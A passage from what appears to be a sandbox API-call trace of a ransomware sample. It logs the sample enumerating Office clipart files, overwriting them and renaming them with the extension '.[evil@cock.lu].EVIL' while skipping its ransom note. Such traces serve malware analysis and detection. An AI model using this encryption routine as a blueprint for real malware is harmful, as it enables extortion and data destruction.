nNumberOfBytesToWrite=0x2060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2060, lpOverlapped=0x0) returned 1 [0144.915] CloseHandle (hObject=0x1a8) returned 1 [0144.915] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.915] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.916] __uncaught_exception () returned 0x84b1160800 [0144.916] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.916] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf.[evil@cock.lu].evil")) returned 1 [0144.917] ??_V@YAXPEAX@Z () returned 0x1 [0144.920] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF", dwFileAttributes=0x200) returned 0 [0144.921] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.921] wcsstr (_Str="J0107724.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.921] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 69 [0144.921] wcscmp (_String1="J0107724.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.921] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107724.WMF") returned 0x0 [0144.921] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 0x45 [0144.921] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.923] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b68, lpOverlapped=0x0) returned 1 [0144.927] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.927] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.927] _errno () returned 0x84b1160840 [0144.927] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.927] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b80, lpOverlapped=0x0) returned 1 [0144.927] CloseHandle (hObject=0x1a8) returned 1 [0144.927] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.927] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.927] __uncaught_exception () returned 0x84b1160800 [0144.927] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.928] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf.[evil@cock.lu].evil")) returned 1 [0144.929] ??_V@YAXPEAX@Z () returned 0x1 [0144.932] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF", dwFileAttributes=0x200) returned 0 [0144.932] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.932] wcsstr (_Str="J0107728.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.933] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF") returned 69 [0144.933] wcscmp (_String1="J0107728.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.933] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107728.WMF") returned 0x0 [0144.933] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF") returned 0x45 [0144.933] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107728.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.935] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1574, lpOverlapped=0x0) returned 1 [0144.950] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.950] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.950] _errno () returned 0x84b1160840 [0144.950] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.950] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1580, lpOverlapped=0x0) returned 1 [0144.950] CloseHandle (hObject=0x1a8) returned 1 [0144.950] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.951] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.951] __uncaught_exception () returned 0x84b1160800 [0144.951] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.951] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107728.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107728.wmf.[evil@cock.lu].evil")) returned 1 [0144.952] ??_V@YAXPEAX@Z () returned 0x1 [0144.956] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF", dwFileAttributes=0x200) returned 0 [0144.956] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.956] wcsstr (_Str="J0107730.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.956] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 69 [0144.956] wcscmp (_String1="J0107730.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.956] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107730.WMF") returned 0x0 [0144.956] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 0x45 [0144.956] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.960] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbf4, lpOverlapped=0x0) returned 1 [0144.963] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.963] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.963] _errno () returned 0x84b1160840 [0144.963] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.963] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc00, lpOverlapped=0x0) returned 1 [0144.963] CloseHandle (hObject=0x1a8) returned 1 [0144.963] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.964] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.964] __uncaught_exception () returned 0x84b1160800 [0144.964] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.964] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf.[evil@cock.lu].evil")) returned 1 [0144.965] ??_V@YAXPEAX@Z () returned 0x1 [0144.969] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF", dwFileAttributes=0x200) returned 0 [0144.970] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.970] wcsstr (_Str="J0107734.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.970] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 69 [0144.970] wcscmp (_String1="J0107734.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.970] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107734.WMF") returned 0x0 [0144.970] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 0x45 [0144.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.973] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc44, lpOverlapped=0x0) returned 1 [0144.976] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.976] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.976] _errno () returned 0x84b1160840 [0144.976] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.976] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc60, lpOverlapped=0x0) returned 1 [0144.977] CloseHandle (hObject=0x1a8) returned 1 [0144.977] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.977] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.977] __uncaught_exception () returned 0x84b1160800 [0144.977] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.977] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf.[evil@cock.lu].evil")) returned 1 [0144.978] ??_V@YAXPEAX@Z () returned 0x1 [0144.982] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF", dwFileAttributes=0x200) returned 0 [0144.983] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.983] wcsstr (_Str="J0107742.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.983] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF") returned 69 [0144.983] wcscmp (_String1="J0107742.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.983] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107742.WMF") returned 0x0 [0144.983] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF") returned 0x45 [0144.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107742.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.985] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe3c, lpOverlapped=0x0) returned 1 [0144.990] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.990] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.990] _errno () returned 0x84b1160840 [0144.990] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.990] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe40, lpOverlapped=0x0) returned 1 [0144.990] CloseHandle (hObject=0x1a8) returned 1 [0144.990] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.990] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.990] __uncaught_exception () returned 0x84b1160800 [0144.990] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.991] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107742.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107742.wmf.[evil@cock.lu].evil")) returned 1 [0144.992] ??_V@YAXPEAX@Z () returned 0x1 [0144.995] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF", dwFileAttributes=0x200) returned 0 [0144.995] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.996] wcsstr (_Str="J0107744.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.996] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 69 [0144.996] wcscmp (_String1="J0107744.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.996] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107744.WMF") returned 0x0 [0144.996] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 0x45 [0144.996] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.998] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x138c, lpOverlapped=0x0) returned 1 [0145.002] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.002] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.002] _errno () returned 0x84b1160840 [0145.002] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.002] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13a0, lpOverlapped=0x0) returned 1 [0145.002] CloseHandle (hObject=0x1a8) returned 1 [0145.002] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.002] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.003] __uncaught_exception () returned 0x84b1160800 [0145.003] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.003] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf.[evil@cock.lu].evil")) returned 1 [0145.004] ??_V@YAXPEAX@Z () returned 0x1 [0145.007] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF", dwFileAttributes=0x200) returned 0 [0145.008] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.008] wcsstr (_Str="J0107746.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.008] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF") returned 69 [0145.008] wcscmp (_String1="J0107746.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.008] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107746.WMF") returned 0x0 [0145.008] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF") returned 0x45 [0145.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107746.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.010] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x12b4, lpOverlapped=0x0) returned 1 [0145.014] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.014] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.014] _errno () returned 0x84b1160840 [0145.014] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.014] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12c0, lpOverlapped=0x0) returned 1 [0145.015] CloseHandle (hObject=0x1a8) returned 1 [0145.015] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.015] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.015] __uncaught_exception () returned 0x84b1160800 [0145.015] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.016] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107746.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107746.wmf.[evil@cock.lu].evil")) returned 1 [0145.017] ??_V@YAXPEAX@Z () returned 0x1 [0145.020] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF", dwFileAttributes=0x200) returned 0 [0145.020] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.020] wcsstr (_Str="J0107748.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.020] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 69 [0145.021] wcscmp (_String1="J0107748.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.021] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107748.WMF") returned 0x0 [0145.021] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 0x45 [0145.021] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.023] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2020, lpOverlapped=0x0) returned 1 [0145.027] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.027] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.027] _errno () returned 0x84b1160840 [0145.027] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.027] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2040, lpOverlapped=0x0) returned 1 [0145.027] CloseHandle (hObject=0x1a8) returned 1 [0145.027] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.028] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.028] __uncaught_exception () returned 0x84b1160800 [0145.028] fclose (in: 